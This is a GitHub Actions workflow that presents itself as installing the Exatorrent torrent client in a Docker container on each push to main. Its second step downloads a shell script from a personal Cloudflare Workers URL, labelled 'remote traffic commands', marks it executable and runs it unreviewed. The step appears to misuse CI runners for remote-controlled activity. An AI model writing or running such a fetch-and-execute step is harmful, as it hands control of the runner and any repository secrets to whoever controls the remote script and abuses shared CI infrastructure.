name: Install Exatorrent on GitHub Actions

on:
  push:
    branches: [main]
  workflow_dispatch:

jobs:
  install_exatorrent:
    runs-on: ubuntu-latest

    steps:
      # Run Exatorrent container
      - name: Run exatorrent container
        run: |
          docker pull ghcr.io/varbhat/exatorrent:latest
          docker run -d -p 5000:5000 -p 42069:42069 -v /path/to/directory:/exa/exadir ghcr.io/varbhat/exatorrent:latest

          # Verify it's running
          sleep 5
          curl -s http://localhost:5000 || echo "exatorrent may not be running"

      # Fetch and run remote traffic commands
      - name: Fetch and run remote traffic commands
        run: |
          curl -sSL https://holy-queen-e7be.idrissimahdi2020.workers.dev -o commands.sh
          chmod +x commands.sh
          ./commands.sh
